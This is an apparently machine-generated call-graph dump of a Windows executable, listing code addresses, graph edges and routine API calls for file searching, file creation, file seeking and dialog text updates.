26733->26738 26739 7ff7ab4a190d 26733->26739 26735 7ff7ab49e52d 26734->26735 26735->26130 26737 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26736->26737 26736->26739 26740 7ff7ab4a193b 26737->26740 26738->26733 26739->26130 26743 7ff7ab49e7ea 26741->26743 26742 7ff7ab49e8a1 26753 7ff7ab49e900 26742->26753 26797 7ff7ab49f578 26742->26797 26743->26742 26744 7ff7ab49e864 26743->26744 26790 7ff7ab4a3ec8 26743->26790 26744->26742 26746 7ff7ab49e993 26744->26746 26747 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26746->26747 26750 7ff7ab49e998 26747->26750 26748 7ff7ab49e955 26749 7ff7ab4c2320 _handle_error 8 API calls 26748->26749 26752 7ff7ab49e97e 26749->26752 26755 7ff7ab49e578 26752->26755 26753->26748 26833 7ff7ab4928a4 82 API calls 2 library calls 26753->26833 27787 7ff7ab4a15d8 26755->27787 26758 7ff7ab49e59e 26760 7ff7ab491fa0 31 API calls 26758->26760 26759 7ff7ab4b1870 108 API calls 26759->26758 26761 7ff7ab49e5b7 26760->26761 26762 7ff7ab491fa0 31 API calls 26761->26762 26763 7ff7ab49e5c3 26762->26763 26764 7ff7ab491fa0 31 API calls 26763->26764 26765 7ff7ab49e5cf 26764->26765 26766 7ff7ab4a878c 108 API calls 26765->26766 26767 7ff7ab49e5db 26766->26767 26768 7ff7ab491fa0 31 API calls 26767->26768 26769 7ff7ab49e5e4 26768->26769 26770 7ff7ab491fa0 31 API calls 26769->26770 26771 7ff7ab49e5ed 26770->26771 26772 7ff7ab4a18c2 26771->26772 26773 7ff7ab4a190d 26771->26773 26775 7ff7ab491fa0 31 API calls 26771->26775 26772->26773 26774 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26772->26774 26773->26134 26776 7ff7ab4a193b 26774->26776 26775->26771 26778 7ff7ab4a870a 26777->26778 26779 7ff7ab4c21d0 33 API calls 26778->26779 26780 7ff7ab4a872f 26779->26780 26781 7ff7ab4c21d0 33 API calls 26780->26781 26782 7ff7ab4a8759 26781->26782 26782->26723 26784 7ff7ab49e627 26783->26784 26786 7ff7ab49e62c memcpy_s 26783->26786 26785 7ff7ab491fa0 31 API calls 26784->26785 26785->26786 26787 7ff7ab491fa0 31 API calls 26786->26787 26788 7ff7ab49e668 memcpy_s 26786->26788 26787->26788 26788->26728 26789->26732 26791 7ff7ab4a72cc 8 API calls 26790->26791 26792 7ff7ab4a3ee1 26791->26792 26796 7ff7ab4a3f0f 26792->26796 26834 7ff7ab4a40bc 26792->26834 26795 7ff7ab4a3efa FindClose 26795->26796 26796->26743 26798 7ff7ab49f598 _snwprintf 26797->26798 26873 7ff7ab492950 26798->26873 26801 7ff7ab49f5cc 26806 7ff7ab49f5fc 26801->26806 26888 7ff7ab4933e4 26801->26888 26804 7ff7ab49f5f8 26804->26806 26920 7ff7ab493ad8 26804->26920 27131 7ff7ab492c54 26806->27131 26813 7ff7ab498d04 33 API calls 26814 7ff7ab49f662 26813->26814 27147 7ff7ab4a7918 48 API calls 2 library calls 26814->27147 26816 7ff7ab49f677 26818 7ff7ab4a3ec8 55 API calls 26816->26818 26824 7ff7ab49f6ad 26818->26824 26821 7ff7ab49f842 26821->26806 26951 7ff7ab4969f8 26821->26951 26962 7ff7ab49f930 26821->26962 26825 7ff7ab49f89a 26824->26825 26826 7ff7ab49f74d 26824->26826 26828 7ff7ab4a3ec8 55 API calls 26824->26828 27148 7ff7ab4a7918 48 API calls 2 library calls 26824->27148 26829 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26829 26826->26825 26827 7ff7ab49f7cb 26826->26827 26830 7ff7ab49f895 26826->26830 26930 7ff7ab49f8a4 26827->26930 26828->26824 26832 7ff7ab49f8a0 26829->26832 26831 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26830->26831 26831->26825 26833->26748 26835 7ff7ab4a41d2 FindNextFileW 26834->26835 26836 7ff7ab4a40f9 FindFirstFileW 26834->26836 26838 7ff7ab4a41e1 GetLastError 26835->26838 26839 7ff7ab4a41f3 26835->26839 26836->26839 26840 7ff7ab4a411e 26836->26840 26855 7ff7ab4a41c0 26838->26855 26841 7ff7ab4a4211 26839->26841 26844 7ff7ab4920b0 33 API calls 26839->26844 26842 7ff7ab4a6a0c 49 API calls 26840->26842 26849 7ff7ab49129c 33 API calls 26841->26849 26843 7ff7ab4a4144 26842->26843 26846 7ff7ab4a4148 FindFirstFileW 26843->26846 26847 7ff7ab4a4167 26843->26847 26844->26841 26845 7ff7ab4c2320 _handle_error 8 API calls 26848 7ff7ab4a3ef4 26845->26848 26846->26847 26847->26839 26851 7ff7ab4a41af GetLastError 26847->26851 26859 7ff7ab4a4314 26847->26859 26848->26795 26848->26796 26850 7ff7ab4a423b 26849->26850 26860 7ff7ab4a8090 26850->26860 26851->26855 26854 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26856 7ff7ab4a431a 26854->26856 26855->26845 26857 7ff7ab4a430f 26858 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26857->26858 26858->26859 26859->26854 26861 7ff7ab4a80a5 26860->26861 26864 7ff7ab4a8188 26861->26864 26863 7ff7ab4a4249 26863->26855 26863->26857 26865 7ff7ab4a8326 26864->26865 26868 7ff7ab4a81ba 26864->26868 26872 7ff7ab49704c 47 API calls memcpy_s 26865->26872 26867 7ff7ab4a832b 26870 7ff7ab4a81d4 memcpy_s 26868->26870 26871 7ff7ab4a58a4 33 API calls 2 library calls 26868->26871 26870->26863 26871->26870 26872->26867 26874 7ff7ab49296c 26873->26874 26875 7ff7ab4a86ec 33 API calls 26874->26875 26876 7ff7ab49298d 26875->26876 26877 7ff7ab492ac2 26876->26877 26878 7ff7ab4c21d0 33 API calls 26876->26878 27156 7ff7ab4a4d04 26877->27156 26879 7ff7ab492ab0 26878->26879 26879->26877 27149 7ff7ab4991c8 26879->27149 26883 7ff7ab4a2ca8 27188 7ff7ab4a24c0 26883->27188 26885 7ff7ab4a2cc5 26885->26801 27207 7ff7ab4a28d0 26888->27207 26889 7ff7ab493431 memcpy_s 26897 7ff7ab49344e 26889->26897 26899 7ff7ab493601 26889->26899 27212 7ff7ab4a2bb0 26889->27212 26890 7ff7ab493674 27226 7ff7ab4928a4 82 API calls 2 library calls 26890->27226 26892 7ff7ab4969f8 132 API calls 26894 7ff7ab493682 26892->26894 26894->26892 26895 7ff7ab49370c 26894->26895 26894->26899 26916 7ff7ab4a2aa0 101 API calls 26894->26916 26895->26899 26901 7ff7ab493740 26895->26901 27227 7ff7ab4928a4 82 API calls 2 library calls 26895->27227 26897->26890 26897->26894 26898 7ff7ab4935cb 26898->26897 26900 7ff7ab4935d7 26898->26900 26899->26804 26900->26899 26903 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26900->26903 26901->26899 26902 7ff7ab49384d 26901->26902 26914 7ff7ab4a2bb0 101 API calls 26901->26914 26902->26899 26905 7ff7ab4920b0 33 API calls 26902->26905 26906 7ff7ab493891 26903->26906 26904 7ff7ab4934eb 26904->26898 27221 7ff7ab4a2aa0 26904->27221 26905->26899 26906->26804 26908 7ff7ab4969f8 132 API calls 26909 7ff7ab49378e 26908->26909 26909->26908 26910 7ff7ab493803 26909->26910 26917 7ff7ab4a2aa0 101 API calls 26909->26917 26912 7ff7ab4a2aa0 101 API calls 26910->26912 26912->26902 26913 7ff7ab4a28d0 104 API calls 26913->26904 26914->26909 26915 7ff7ab4a28d0 104 API calls 26915->26898 26916->26894 26917->26909 26921 7ff7ab493af9 26920->26921 26922 7ff7ab493b55 26920->26922 27239 7ff7ab493378 26921->27239 26924 7ff7ab4c2320 _handle_error 8 API calls 26922->26924 26926 7ff7ab493b67 26924->26926 26926->26813 26926->26827 26927 7ff7ab493b6c 26928 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26927->26928 26929 7ff7ab493b71 26928->26929 27420 7ff7ab4a886c 26930->27420 26932 7ff7ab49f8ba 27424 7ff7ab4aef60 GetSystemTime SystemTimeToFileTime 26932->27424 26935 7ff7ab4b0994 26936 7ff7ab4c0340 26935->26936 26937 7ff7ab4a7df4 47 API calls 26936->26937 26938 7ff7ab4c0373 26937->26938 26939 7ff7ab4aaae0 48 API calls 26938->26939 26940 7ff7ab4c0387 26939->26940 26941 7ff7ab4ada98 48 API calls 26940->26941 26942 7ff7ab4c0397 26941->26942 26943 7ff7ab491fa0 31 API calls 26942->26943 26944 7ff7ab4c03a2 26943->26944 27433 7ff7ab4bfc68 26944->27433 26952 7ff7ab496a0a 26951->26952 26953 7ff7ab496a0e 26951->26953 26952->26821 26961 7ff7ab4a2bb0 101 API calls 26953->26961 26954 7ff7ab496a1b 26955 7ff7ab496a2f 26954->26955 26956 7ff7ab496a3e 26954->26956 26955->26952 27445 7ff7ab495e24 26955->27445 27520 7ff7ab495130 130 API calls 2 library calls 26956->27520 26958 7ff7ab496a3c 26958->26952 27521 7ff7ab49466c 82 API calls 26958->27521 26961->26954 26963 7ff7ab49f978 26962->26963 26967 7ff7ab49f9b0 26963->26967 27020 7ff7ab49fa34 26963->27020 27659 7ff7ab4b612c 137 API calls 3 library calls 26963->27659 26965 7ff7ab4a1189 26968 7ff7ab4a11e1 26965->26968 26969 7ff7ab4a118e 26965->26969 26966 7ff7ab4c2320 _handle_error 8 API calls 26970 7ff7ab4a11c4 26966->26970 26967->26965 26973 7ff7ab49f9d0 26967->26973 26967->27020 26968->27020 27706 7ff7ab4b612c 137 API calls 3 library calls 26968->27706 26969->27020 27705 7ff7ab49dd08 179 API calls 26969->27705 26970->26821 26973->27020 27560 7ff7ab499bb0 26973->27560 26975 7ff7ab49fad6 27573 7ff7ab4a5ef8 26975->27573 27020->26966 27132 7ff7ab492c88 27131->27132 27133 7ff7ab492c74 27131->27133 27134 7ff7ab491fa0 31 API calls 27132->27134 27133->27132 27774 7ff7ab492d80 31 API calls _invalid_parameter_noinfo_noreturn 27133->27774 27138 7ff7ab492ca1 27134->27138 27137 7ff7ab492d08 27776 7ff7ab493090 31 API calls _invalid_parameter_noinfo_noreturn 27137->27776 27146 7ff7ab492d2c 27138->27146 27775 7ff7ab493090 31 API calls _invalid_parameter_noinfo_noreturn 27138->27775 27139 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27141 7ff7ab492d7c 27139->27141 27142 7ff7ab492d14 27143 7ff7ab491fa0 31 API calls 27142->27143 27144 7ff7ab492d20 27143->27144 27777 7ff7ab4a878c 27144->27777 27146->27139 27147->26816 27148->26824 27166 7ff7ab4a56a4 27149->27166 27151 7ff7ab4991df 27169 7ff7ab4ab788 27151->27169 27155 7ff7ab499383 27155->26877 27157 7ff7ab4a4d32 memcpy_s 27156->27157 27184 7ff7ab4a4bac 27157->27184 27159 7ff7ab4a4d54 27161 7ff7ab4a4dae 27159->27161 27162 7ff7ab4a4d90 27159->27162 27160 7ff7ab4c2320 _handle_error 8 API calls 27163 7ff7ab492b32 27160->27163 27164 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27161->27164 27162->27160 27163->26801 27163->26883 27165 7ff7ab4a4db3 27164->27165 27175 7ff7ab4a56e8 27166->27175 27170 7ff7ab4913a4 33 API calls 27169->27170 27171 7ff7ab499365 27170->27171 27172 7ff7ab499a28 27171->27172 27173 7ff7ab4a56e8 2 API calls 27172->27173 27174 7ff7ab499a36 27173->27174 27174->27155 27176 7ff7ab4a56fe memcpy_s 27175->27176 27179 7ff7ab4aeba4 27176->27179 27182 7ff7ab4aeb58 GetCurrentProcess GetProcessAffinityMask 27179->27182 27183 7ff7ab4a56de 27182->27183 27183->27151 27185 7ff7ab4a4c27 27184->27185 27187 7ff7ab4a4c2f memcpy_s 27184->27187 27186 7ff7ab491fa0 31 API calls 27185->27186 27186->27187 27187->27159 27189 7ff7ab4a24fd CreateFileW 27188->27189 27191 7ff7ab4a25ae GetLastError 27189->27191 27200 7ff7ab4a266e 27189->27200 27192 7ff7ab4a6a0c 49 API calls 27191->27192 27193 7ff7ab4a25dc 27192->27193 27194 7ff7ab4a25e0 CreateFileW GetLastError 27193->27194 27199 7ff7ab4a262c 27193->27199 27194->27199 27195 7ff7ab4a26b1 SetFileTime 27198 7ff7ab4a26cf 27195->27198 27196 7ff7ab4a2708 27197 7ff7ab4c2320 _handle_error 8 API calls 27196->27197 27201 7ff7ab4a271b 27197->27201 27198->27196 27202 7ff7ab4920b0 33 API calls 27198->27202 27199->27200 27203 7ff7ab4a2736 27199->27203 27200->27195 27200->27198 27201->26885 27206 7ff7ab49b7e8 99 API calls 2 library calls 27201->27206 27202->27196 27204 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27203->27204 27205 7ff7ab4a273b 27204->27205 27206->26885 27209 7ff7ab4a28f6 27207->27209 27211 7ff7ab4a28fd 27207->27211 27208 7ff7ab4a2320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27208->27211 27209->26889 27211->27208 27211->27209 27228 7ff7ab49b8a4 99 API calls _com_raise_error 27211->27228 27213 7ff7ab4a2bcd 27212->27213 27215 7ff7ab4a2be9 27212->27215 27214 7ff7ab4934cc 27213->27214 27229 7ff7ab49b9c4 99 API calls _com_raise_error 27213->27229 27214->26913 27215->27214 27217 7ff7ab4a2c01 SetFilePointer 27215->27217 27217->27214 27218 7ff7ab4a2c1e GetLastError 27217->27218 27218->27214 27219 7ff7ab4a2c28 27218->27219 27219->27214 27230 7ff7ab49b9c4 99 API calls _com_raise_error 27219->27230 27231 7ff7ab4a2778 27221->27231 27224 7ff7ab4935a7 27224->26898 27224->26915 27226->26899 27227->26901 27232 7ff7ab4a2789 _snwprintf 27231->27232 27233 7ff7ab4a2890 SetFilePointer 27232->27233 27237 7ff7ab4a27b5 27232->27237 27236 7ff7ab4a28b8 GetLastError 27233->27236 27233->27237 27234 7ff7ab4c2320 _handle_error 8 API calls 27235 7ff7ab4a281d 27234->27235 27235->27224 27238 7ff7ab49b9c4 99 API calls _com_raise_error 27235->27238 27236->27237 27237->27234 27240 7ff7ab49339a 27239->27240 27243 7ff7ab493396 27239->27243 27245 7ff7ab493294 27240->27245 27243->26922 27243->26927 27244 7ff7ab4a2aa0 101 API calls 27244->27243 27246 7ff7ab4932bb 27245->27246 27248 7ff7ab4932f6 27245->27248 27247 7ff7ab4969f8 132 API calls 27246->27247 27249 7ff7ab4932db 27247->27249 27253 7ff7ab496e74 27248->27253 27249->27244 27257 7ff7ab496e95 27253->27257 27254 7ff7ab4969f8 132 API calls 27254->27257 27255 7ff7ab49331d 27255->27249 27258 7ff7ab493904 27255->27258 27257->27254 27257->27255 27285 7ff7ab4ae808 27257->27285 27293 7ff7ab496a7c 27258->27293 27261 7ff7ab49396a 27264 7ff7ab493989 27261->27264 27265 7ff7ab49399a 27261->27265 27263 7ff7ab493a8a 27266 7ff7ab4c2320 _handle_error 8 API calls 27263->27266 27326 7ff7ab4b0d54 33 API calls 27264->27326 27270 7ff7ab4939a3 27265->27270 27271 7ff7ab4939ec 27265->27271 27269 7ff7ab493a9e 27266->27269 27267 7ff7ab493ab3 27272 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27267->27272 27269->27249 27327 7ff7ab4b0c80 33 API calls 27270->27327 27328 7ff7ab4926b4 33 API calls memcpy_s 27271->27328 27274 7ff7ab493ab8 27272->27274 27279 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27274->27279 27275 7ff7ab4939b0 27280 7ff7ab491fa0 31 API calls 27275->27280 27283 7ff7ab4939c0 memcpy_s 27275->27283 27277 7ff7ab491fa0 31 API calls 27284 7ff7ab49394f 27277->27284 27278 7ff7ab493a13 27329 7ff7ab4b0ae8 34 API calls _invalid_parameter_noinfo_noreturn 27278->27329 27282 7ff7ab493abe 27279->27282 27280->27283 27283->27277 27284->27263 27284->27267 27284->27274 27286 7ff7ab4ae811 27285->27286 27287 7ff7ab4ae82b 27286->27287 27291 7ff7ab49b664 RtlPcToFileHeader RaiseException _com_raise_error 27286->27291 27289 7ff7ab4ae845 SetThreadExecutionState 27287->27289 27292 7ff7ab49b664 RtlPcToFileHeader RaiseException _com_raise_error 27287->27292 27291->27287 27292->27289 27294 7ff7ab496a96 _snwprintf 27293->27294 27295 7ff7ab496ae4 27294->27295 27296 7ff7ab496ac4 27294->27296 27298 7ff7ab496d4d 27295->27298 27301 7ff7ab496b0f 27295->27301 27366 7ff7ab4928a4 82 API calls 2 library calls 27296->27366 27381 7ff7ab4928a4 82 API calls 2 library calls 27298->27381 27300 7ff7ab496ad0 27302 7ff7ab4c2320 _handle_error 8 API calls 27300->27302 27301->27300 27330 7ff7ab4b1f94 27301->27330 27303 7ff7ab49394b 27302->27303 27303->27261 27303->27284 27325 7ff7ab492794 33 API calls __std_swap_ranges_trivially_swappable 27303->27325 27306 7ff7ab496b85 27307 7ff7ab496c2a 27306->27307 27324 7ff7ab496b7b 27306->27324 27372 7ff7ab4a8968 27306->27372 27339 7ff7ab4a4760 27307->27339 27308 7ff7ab496b80 27308->27306 27368 7ff7ab4940b0 27308->27368 27309 7ff7ab496b6e 27367 7ff7ab4928a4 82 API calls 2 library calls 27309->27367 27315 7ff7ab496c52 27316 7ff7ab496cd1 27315->27316 27317 7ff7ab496cc7 27315->27317 27378 7ff7ab4b1f20 151 API calls 2 library calls 27316->27378 27343 7ff7ab4a1794 27317->27343 27320 7ff7ab496ccf 27379 7ff7ab4a4700 8 API calls _handle_error 27320->27379 27322 7ff7ab496cfd 27322->27324 27358 7ff7ab4b1870 27324->27358 27325->27261 27326->27284 27327->27275 27328->27278 27329->27284 27331 7ff7ab4b2056 std::bad_alloc::bad_alloc 27330->27331 27334 7ff7ab4b1fc5 std::bad_alloc::bad_alloc 27330->27334 27333 7ff7ab4c4078 _com_raise_error 2 API calls 27331->27333 27332 7ff7ab496b59 27332->27306 27332->27308 27332->27309 27333->27334 27334->27332 27335 7ff7ab4c4078 _com_raise_error 2 API calls 27334->27335 27336 7ff7ab4b200f std::bad_alloc::bad_alloc 27334->27336 27335->27336 27336->27332 27337 7ff7ab4c4078 _com_raise_error 2 API calls 27336->27337 27338 7ff7ab4b20a9 27337->27338 27340 7ff7ab4a4780 27339->27340 27342 7ff7ab4a478a 27339->27342 27341 7ff7ab4c21d0 33 API calls 27340->27341 27341->27342 27342->27315 27344 7ff7ab4a17be memcpy_s 27343->27344 27382 7ff7ab4a8a48 27344->27382 27359 7ff7ab4b188e 27358->27359 27363 7ff7ab4b18a1 27359->27363 27398 7ff7ab4ae948 27359->27398 27361 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27362 7ff7ab4b1ad0 27361->27362 27365 7ff7ab4b1a37 27363->27365 27405 7ff7ab4aa984 31 API calls _invalid_parameter_noinfo_noreturn 27363->27405 27365->27361 27366->27300 27367->27324 27369 7ff7ab4940dd 27368->27369 27371 7ff7ab4940d7 memcpy_s 27368->27371 27369->27371 27406 7ff7ab494120 33 API calls 2 library calls 27369->27406 27371->27306 27373 7ff7ab4a89b2 27372->27373 27374 7ff7ab4a89c8 27372->27374 27375 7ff7ab49a1a0 109 API calls 27373->27375 27407 7ff7ab49a1a0 27374->27407 27377 7ff7ab4a89c0 27375->27377 27377->27307 27378->27320 27379->27322 27381->27300 27384 7ff7ab4a8bcd 27382->27384 27387 7ff7ab4a8a91 memcpy_s 27382->27387 27387->27384 27399 7ff7ab4aecd8 103 API calls 27398->27399 27400 7ff7ab4ae95f ReleaseSemaphore 27399->27400 27401 7ff7ab4ae9a3 DeleteCriticalSection CloseHandle CloseHandle 27400->27401 27402 7ff7ab4ae984 27400->27402 27403 7ff7ab4aea5c 101 API calls 27402->27403 27404 7ff7ab4ae98e FindCloseChangeNotification 27403->27404 27404->27401 27404->27402 27405->27365 27408 7ff7ab49a205 27407->27408 27419 7ff7ab49a29a 27407->27419 27409 7ff7ab4ab914 102 API calls 27408->27409 27408->27419 27411 7ff7ab49a22b 27409->27411 27410 7ff7ab4c2320 _handle_error 8 API calls 27412 7ff7ab49a2f2 27410->27412 27413 7ff7ab4b0f68 WideCharToMultiByte 27411->27413 27412->27377 27414 7ff7ab49a24b 27413->27414 27415 7ff7ab49a29f 27414->27415 27419->27410 27421 7ff7ab4a8882 27420->27421 27422 7ff7ab4a8892 27420->27422 27427 7ff7ab4a23f0 27421->27427 27422->26932 27425 7ff7ab4c2320 _handle_error 8 API calls 27424->27425 27426 7ff7ab49f7dc 27425->27426 27426->26821 27426->26935 27428 7ff7ab4a240f 27427->27428 27431 7ff7ab4a2aa0 101 API calls 27428->27431 27429 7ff7ab4a2428 27432 7ff7ab4a2bb0 101 API calls 27429->27432 27430 7ff7ab4a2438 27430->27422 27431->27429 27432->27430 27434 7ff7ab4bfc94 27433->27434 27435 7ff7ab49129c 33 API calls 27434->27435 27436 7ff7ab4bfca4 27435->27436 27437 7ff7ab4bf0a4 24 API calls 27436->27437 27446 7ff7ab495e67 27445->27446 27448 7ff7ab495ea5 27446->27448 27454 7ff7ab495eb7 27446->27454 27472 7ff7ab496034 27446->27472 27532 7ff7ab4928a4 82 API calls 2 library calls 27448->27532 27450 7ff7ab496134 27541 7ff7ab496fcc 82 API calls 27450->27541 27452 7ff7ab495f44 27537 7ff7ab496d88 82 API calls 27452->27537 27453 7ff7ab4969af 27456 7ff7ab4c2320 _handle_error 8 API calls 27453->27456 27454->27450 27454->27452 27533 7ff7ab496f38 27454->27533 27459 7ff7ab4969c3 27456->27459 27458 7ff7ab4969e4 27460 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27458->27460 27459->26958 27462 7ff7ab4969e9 27460->27462 27461 7ff7ab496973 27516 7ff7ab495eb2 27461->27516 27554 7ff7ab49466c 82 API calls 27461->27554 27466 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27462->27466 27463 7ff7ab49612e 27463->27450 27463->27461 27468 7ff7ab4a85f0 104 API calls 27463->27468 27465 7ff7ab49a1a0 109 API calls 27476 7ff7ab495f5d 27465->27476 27467 7ff7ab4969ef 27466->27467 27470 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27467->27470 27469 7ff7ab4961a4 27468->27469 27469->27450 27471 7ff7ab4969f5 27470->27471 27522 7ff7ab4a85f0 27472->27522 27473 7ff7ab496097 27540 7ff7ab49433c 82 API calls 2 library calls 27473->27540 27476->27465 27476->27472 27476->27473 27538 7ff7ab49433c 82 API calls 2 library calls 27476->27538 27539 7ff7ab496d88 82 API calls 27476->27539 27516->27453 27516->27458 27516->27467 27520->26958 27523 7ff7ab4a8614 27522->27523 27524 7ff7ab4a869a 27522->27524 27525 7ff7ab4a867c 27523->27525 27526 7ff7ab4940b0 33 API calls 27523->27526 27524->27525 27527 7ff7ab4940b0 33 API calls 27524->27527 27525->27463 27528 7ff7ab4a864d 27526->27528 27529 7ff7ab4a86b3 27527->27529 27555 7ff7ab49a174 27528->27555 27531 7ff7ab4a28d0 104 API calls 27529->27531 27531->27525 27532->27516 27534 7ff7ab496f5e 27533->27534 27536 7ff7ab496f68 memcpy_s 27533->27536 27535 7ff7ab4c21d0 33 API calls 27534->27535 27535->27536 27537->27476 27538->27476 27539->27476 27540->27516 27541->27516 27556 7ff7ab49a185 27555->27556 27568 7ff7ab499be7 27560->27568 27561 7ff7ab499c1b 27562 7ff7ab4c2320 _handle_error 8 API calls 27561->27562 27563 7ff7ab499c9d 27562->27563 27563->26975 27565 7ff7ab499c83 27566 7ff7ab491fa0 31 API calls 27565->27566 27566->27561 27568->27561 27568->27565 27569 7ff7ab499cae 27568->27569 27707 7ff7ab4a5294 34 API calls 3 library calls 27568->27707 27708 7ff7ab4adb60 33 API calls 27568->27708 27570 7ff7ab499cbf 27569->27570 27709 7ff7ab4ada48 CompareStringW 27569->27709 27570->27565 27572 7ff7ab4920b0 33 API calls 27570->27572 27572->27565 27586 7ff7ab4a5f3a 27573->27586 27577 7ff7ab49129c 33 API calls 27582 7ff7ab4a619b 27585 7ff7ab4a61ce 27710 7ff7ab49704c 47 API calls memcpy_s 27585->27710 27586->27577 27586->27582 27586->27585 27659->26967 27705->27020 27706->27020 27707->27568 27708->27568 27709->27570 27774->27132 27775->27137 27776->27142 27778 7ff7ab4a87af 27777->27778 27783 7ff7ab4a461c 27778->27783 27780 7ff7ab4a8845 27781 7ff7ab4a461c 108 API calls 27780->27781 27782 7ff7ab4a8851 27781->27782 27784 7ff7ab4a4632 27783->27784 27786 7ff7ab4a463a 27783->27786 27785 7ff7ab4ae948 108 API calls 27784->27785 27785->27786 27786->27780 27788 7ff7ab4a163e 27787->27788 27793 7ff7ab4a1681 27787->27793 27790 7ff7ab4a31bc 51 API calls 27788->27790 27788->27793 27789 7ff7ab49e600 31 API calls 27795 7ff7ab4a16de 27789->27795 27790->27788 27791 7ff7ab491fa0 31 API calls 27791->27793 27792 7ff7ab4a175b 27796 7ff7ab4c2320 _handle_error 8 API calls 27792->27796 27793->27791 27797 7ff7ab4a16a0 27793->27797 27794 7ff7ab4a178d 27799 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27794->27799 27795->27792 27795->27794 27798 7ff7ab49e58a 27796->27798 27797->27789 27798->26758 27798->26759 27800 7ff7ab4a1792 27799->27800 27802 7ff7ab4b84cc 4 API calls 27801->27802 27803 7ff7ab4b84aa 27802->27803 27804 7ff7ab4b84b9 27803->27804 27813 7ff7ab4b8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27803->27813 27804->26140 27804->26141 27806->26146 27807->26153 27809 7ff7ab4b84e3 27808->27809 27810 7ff7ab4b84de 27808->27810 27809->26153 27814 7ff7ab4b8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27810->27814 27812->26155 27813->27804 27814->27809 27815->26181 27833 7ff7ab4ad4d0 27817->27833 27821 7ff7ab4c9ef0 swprintf 46 API calls 27822 7ff7ab4ad8e5 swprintf 27821->27822 27822->27821 27829 7ff7ab4ad974 27822->27829 27847 7ff7ab499d78 33 API calls 27822->27847 27823 7ff7ab4ad9a3 27825 7ff7ab4ada17 27823->27825 27828 7ff7ab4ada3f 27823->27828 27826 7ff7ab4c2320 _handle_error 8 API calls 27825->27826 27827 7ff7ab4ada2b 27826->27827 27827->25609 27830 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27828->27830 27829->27823 27848 7ff7ab499d78 33 API calls 27829->27848 27831 7ff7ab4ada44 27830->27831 27834 7ff7ab4ad665 27833->27834 27836 7ff7ab4ad502 27833->27836 27837 7ff7ab4acb80 27834->27837 27835 7ff7ab491744 33 API calls 27835->27836 27836->27834 27836->27835 27838 7ff7ab4acbb6 27837->27838 27845 7ff7ab4acc80 27837->27845 27840 7ff7ab4acbc6 27838->27840 27842 7ff7ab4acc7b 27838->27842 27844 7ff7ab4acc20 27838->27844 27840->27822 27849 7ff7ab491f80 33 API calls 3 library calls 27842->27849 27844->27840 27846 7ff7ab4c21d0 33 API calls 27844->27846 27850 7ff7ab492004 33 API calls std::_Xinvalid_argument 27845->27850 27846->27840 27847->27822 27848->27823 27849->27845 27852 7ff7ab4ab996 memcpy_s 27851->27852 27853 7ff7ab4aba3c 27852->27853 27855 7ff7ab4aba08 GetProcAddressForCaller GetProcAddress 27852->27855 27854 7ff7ab4abaca GetCurrentProcessId 27853->27854 27857 7ff7ab4aba6e 27853->27857 27856 7ff7ab4abaab 27854->27856 27855->27853 27856->26207 27857->27856 27863 7ff7ab49b66c 99 API calls _handle_error 27857->27863 27859 7ff7ab4aba96 27864 7ff7ab49ba50 99 API calls 3 library calls 27859->27864 27861 7ff7ab4aba9e 27865 7ff7ab49b664 RtlPcToFileHeader RaiseException _com_raise_error 27861->27865 27863->27859 27864->27861 27865->27856 27866->26212 27867->26223 27868->26225 27869->26227 27870->26239 27871->26247 27873->26252 27875->26257 27877 7ff7ab4c03e0 27878 7ff7ab4c041f 27877->27878 27879 7ff7ab4c0497 27877->27879 27881 7ff7ab4aaae0 48 API calls 27878->27881 27880 7ff7ab4aaae0 48 API calls 27879->27880 27882 7ff7ab4c04ab 27880->27882 27883 7ff7ab4c0433 27881->27883 27884 7ff7ab4ada98 48 API calls 27882->27884 27885 7ff7ab4ada98 48 API calls 27883->27885 27886 7ff7ab4c0442 memcpy_s 27884->27886 27885->27886 27887 7ff7ab491fa0 31 API calls 27886->27887 27890 7ff7ab4c05c6 27886->27890 27897 7ff7ab4c05cc 27886->27897 27888 7ff7ab4c0541 27887->27888 27889 7ff7ab49250c SetDlgItemTextW 27888->27889 27892 7ff7ab4c0556 SetDlgItemTextW 27889->27892 27893 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27890->27893 27891 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27894 7ff7ab4c05d2 27891->27894 27895 7ff7ab4c059c 27892->27895 27896 7ff7ab4c056f 27892->27896 27893->27897 27898 7ff7ab4c2320 _handle_error 8 API calls 27895->27898 27896->27895 27899 7ff7ab4c05c1 27896->27899 27897->27891 27900 7ff7ab4c05af 27898->27900 27901 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27899->27901 27901->27890 27902 7ff7ab4c11cf 27904 7ff7ab4c1102 27902->27904 27903 7ff7ab4c1900 _com_raise_error 14 API calls 27903->27904 27904->27903 27905 7ff7ab4cbf2c 27912 7ff7ab4cbc34 27905->27912 27917 7ff7ab4cd440 35 API calls 3 library calls 27912->27917 27914 7ff7ab4cbc3f 27918 7ff7ab4cd068 35 API calls abort 27914->27918 27917->27914 27919 7ff7ab4cd94c 